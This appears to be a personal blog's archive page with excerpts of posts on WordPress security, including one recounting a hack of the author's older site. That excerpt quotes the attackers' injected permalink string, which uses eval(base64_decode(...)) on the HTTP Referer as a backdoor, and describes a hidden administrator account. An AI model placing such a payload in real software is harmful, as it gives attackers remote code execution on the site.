Converting this WordPress site from http: to https: – Part 1

Part 1 – A rant about flaws in the design concept of WordPress

This site launched on September 11, 2006.

At the time, I didn’t love the concept of running software on the server to create the site. I was also looking at this Blosxom software which generated a static site. It’s usage was a little programmer-like rather than writing-like, and WordPress promised a friendly interface for typing.

(If only Microsoft Frontpage had kept on developing…)

Running live website creation software on the server seemed like a bad idea to me. So open for all kinds of security issues, performance issues, and (as time has proved) software update issues. So much yuck for the sake of a certain type of convenience.

Note:  that link to Blosxom is something I just found. It used to be at a URL like raelity.org and that seems to be some sort of copy on sourceforge. I don’t think Blosxom is updated anymore (although static site generation is becoming a thing again.)

Read moreConverting this WordPress site from http: to https: – Part 1

You can’t go out this Friday night, it’s time to update WordPress to Version 3.4.2

Holy mother of toad! Again! WordPress just loves to release those late in the week security updates. We already know how hackers work — they do a file compare of the old WordPress version to the new one, the write some code to exploit the vulnerability, and then they set the code loose on whatever … Read moreYou can’t go out this Friday night, it’s time to update WordPress to Version 3.4.2

The “Too Late” Info on Drive-By Malware

Ah – by the time you read this, it will be too late.

By that I mean that after you’ve been hit by some Drive-By Malware — some website that forces your computer to run a fake anti-virus scan, etc. — then you’re already compromised. If it’s really clever software, it’ll disable your internet access so that you won’t be able to find an article like this.

Read moreThe “Too Late” Info on Drive-By Malware

WordPress Security Exploits – This site was hacked

I still have no idea what this means.

I’m currently running WordPress 2.8.4 on this site.

One of my older sites was hacked as per

https://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

and the permalinks were changed to

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.

Read moreWordPress Security Exploits – This site was hacked